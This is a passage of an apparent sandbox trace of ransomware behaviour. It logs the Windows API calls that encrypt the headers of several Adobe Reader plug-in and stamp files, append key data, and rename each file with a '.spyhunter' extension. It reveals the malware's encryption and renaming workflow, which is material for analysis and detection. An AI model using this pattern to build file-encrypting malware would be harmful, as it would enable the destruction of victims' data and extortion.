lpNumberOfBytesRead=0x57f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0117.931] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.931] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0117.932] GetProcessHeap () returned 0x2c0000 [0117.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.932] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.932] WriteFile (in: hFile=0xec, lpBuffer=0x57f90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8cc, lpOverlapped=0x0 | out: lpBuffer=0x57f90c*, lpNumberOfBytesWritten=0x57f8cc*=0x4, lpOverlapped=0x0) returned 1 [0117.940] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8cc*=0x30, lpOverlapped=0x0) returned 1 [0117.940] CloseHandle (hObject=0xec) returned 1 [0117.940] GetProcessHeap () returned 0x2c0000 [0117.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.940] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf.spyhunter") returned 114 [0117.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf.spyhunter")) returned 1 [0117.941] GetProcessHeap () returned 0x2c0000 [0117.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.941] GetProcessHeap () returned 0x2c0000 [0117.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.941] GetProcessHeap () returned 0x2c0000 [0117.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2b40 | out: hHeap=0x2c0000) returned 1 [0117.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f908 | out: pbBuffer=0x57f908) returned 1 [0117.941] GetProcessHeap () returned 0x2c0000 [0117.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f900*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f900*=0x30) returned 1 [0117.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.942] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf") returned 96 [0117.942] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0117.942] GetProcessHeap () returned 0x2c0000 [0117.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.942] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8c4*=0x2800, lpOverlapped=0x0) returned 1 [0117.960] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.960] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8c4*=0x2800, lpOverlapped=0x0) returned 1 [0117.960] GetProcessHeap () returned 0x2c0000 [0117.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.960] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.960] WriteFile (in: hFile=0xec, lpBuffer=0x57f904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8c4, lpOverlapped=0x0 | out: lpBuffer=0x57f904*, lpNumberOfBytesWritten=0x57f8c4*=0x4, lpOverlapped=0x0) returned 1 [0117.962] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8c4*=0x30, lpOverlapped=0x0) returned 1 [0117.962] CloseHandle (hObject=0xec) returned 1 [0117.962] GetProcessHeap () returned 0x2c0000 [0117.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.962] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf.spyhunter") returned 106 [0117.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf.spyhunter")) returned 1 [0117.996] GetProcessHeap () returned 0x2c0000 [0117.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.996] GetProcessHeap () returned 0x2c0000 [0117.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.996] GetProcessHeap () returned 0x2c0000 [0117.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e91740 | out: hHeap=0x2c0000) returned 1 [0117.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f900 | out: pbBuffer=0x57f900) returned 1 [0117.998] GetProcessHeap () returned 0x2c0000 [0117.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8f8*=0x30) returned 1 [0117.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.049] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf") returned 104 [0118.049] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0118.049] GetProcessHeap () returned 0x2c0000 [0118.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.049] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0118.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.084] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0118.085] GetProcessHeap () returned 0x2c0000 [0118.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.085] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.085] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x57f8fc*, lpNumberOfBytesWritten=0x57f8bc*=0x4, lpOverlapped=0x0) returned 1 [0118.148] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8bc*=0x30, lpOverlapped=0x0) returned 1 [0118.148] CloseHandle (hObject=0xb4) returned 1 [0118.149] GetProcessHeap () returned 0x2c0000 [0118.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.149] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf.spyhunter") returned 114 [0118.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standardbusiness.pdf.spyhunter")) returned 1 [0118.150] GetProcessHeap () returned 0x2c0000 [0118.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.150] GetProcessHeap () returned 0x2c0000 [0118.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0118.150] GetProcessHeap () returned 0x2c0000 [0118.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2a18 | out: hHeap=0x2c0000) returned 1 [0118.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f900 | out: pbBuffer=0x57f900) returned 1 [0118.150] GetProcessHeap () returned 0x2c0000 [0118.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0118.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8f8*=0x30) returned 1 [0118.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.152] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api") returned 79 [0118.152] StrStrW (lpFirst="MakeAccessible.api", lpSrch=".txt") returned 0x0 [0118.152] GetProcessHeap () returned 0x2c0000 [0118.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.152] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0118.267] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.267] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0118.267] GetProcessHeap () returned 0x2c0000 [0118.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.267] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.267] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x57f8fc*, lpNumberOfBytesWritten=0x57f8bc*=0x4, lpOverlapped=0x0) returned 1 [0118.587] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8bc*=0x30, lpOverlapped=0x0) returned 1 [0118.588] CloseHandle (hObject=0xb4) returned 1 [0118.617] GetProcessHeap () returned 0x2c0000 [0118.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.617] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api.spyhunter") returned 89 [0118.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api.spyhunter")) returned 1 [0118.621] GetProcessHeap () returned 0x2c0000 [0118.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.621] GetProcessHeap () returned 0x2c0000 [0118.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0118.621] GetProcessHeap () returned 0x2c0000 [0118.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e71260 | out: hHeap=0x2c0000) returned 1 [0118.621] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8f8 | out: pbBuffer=0x57f8f8) returned 1 [0118.621] GetProcessHeap () returned 0x2c0000 [0118.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0118.621] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8f0*=0x30) returned 1 [0118.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0118.629] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf") returned 96 [0118.629] StrStrW (lpFirst="Standard.pdf", lpSrch=".txt") returned 0x0 [0118.629] GetProcessHeap () returned 0x2c0000 [0118.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.629] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8b4*=0x2800, lpOverlapped=0x0) returned 1 [0118.683] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.683] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8b4*=0x2800, lpOverlapped=0x0) returned 1 [0118.684] GetProcessHeap () returned 0x2c0000 [0118.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.684] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.684] WriteFile (in: hFile=0xec, lpBuffer=0x57f8f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x57f8f4*, lpNumberOfBytesWritten=0x57f8b4*=0x4, lpOverlapped=0x0) returned 1 [0118.741] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8b4*=0x30, lpOverlapped=0x0) returned 1 [0118.741] CloseHandle (hObject=0xec) returned 1 [0118.775] GetProcessHeap () returned 0x2c0000 [0118.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.776] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf.spyhunter") returned 106 [0118.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf.spyhunter")) returned 1 [0118.777] GetProcessHeap () returned 0x2c0000 [0118.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.777] GetProcessHeap () returned 0x2c0000 [0118.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0118.777] GetProcessHeap () returned 0x2c0000 [0118.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48d88 | out: hHeap=0x2c0000) returned 1 [0118.777] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8f8 | out: pbBuffer=0x57f8f8) returned 1 [0118.777] GetProcessHeap () returned 0x2c0000 [0118.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0118.777] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8f0*=0x30) returned 1 [0118.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0118.778] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api") returned 73 [0118.778] StrStrW (lpFirst="Spelling.api", lpSrch=".txt") returned 0x0 [0118.778] GetProcessHeap () returned 0x2c0000 [0118.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.778] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8b4*=0x2800, lpOverlapped=0x0) returned 1 [0118.800] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.800] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8b4*=0x2800, lpOverlapped=0x0) returned 1 [0118.800] GetProcessHeap () returned 0x2c0000 [0118.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.800] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.800] WriteFile (in: hFile=0x120, lpBuffer=0x57f8f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x57f8f4*, lpNumberOfBytesWritten=0x57f8b4*=0x4, lpOverlapped=0x0) returned 1 [0118.835] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8b4*=0x30, lpOverlapped=0x0) returned 1 [0118.835] CloseHandle (hObject=0x120) returned 1 [0118.836] GetProcessHeap () returned 0x2c0000 [0118.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.836] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api.spyhunter") returned 83 [0118.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api.spyhunter")) returned 1 [0118.838] GetProcessHeap () returned 0x2c0000 [0118.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.838] GetProcessHeap () returned 0x2c0000 [0118.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0118.838] GetProcessHeap () returned 0x2c0000 [0118.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44528 | out: hHeap=0x2c0000) returned 1 [0118.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8f0 | out: pbBuffer=0x57f8f0) returned 1 [0118.839] GetProcessHeap () returned 0x2c0000 [0118.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0118.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8e8*=0x30) returned 1 [0118.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0118.840] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api") returned 74 [0118.840] StrStrW (lpFirst="SaveAsRTF.api", lpSrch=".txt") returned 0x0 [0118.840] GetProcessHeap () returned 0x2c0000 [0118.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.840] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0118.909] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 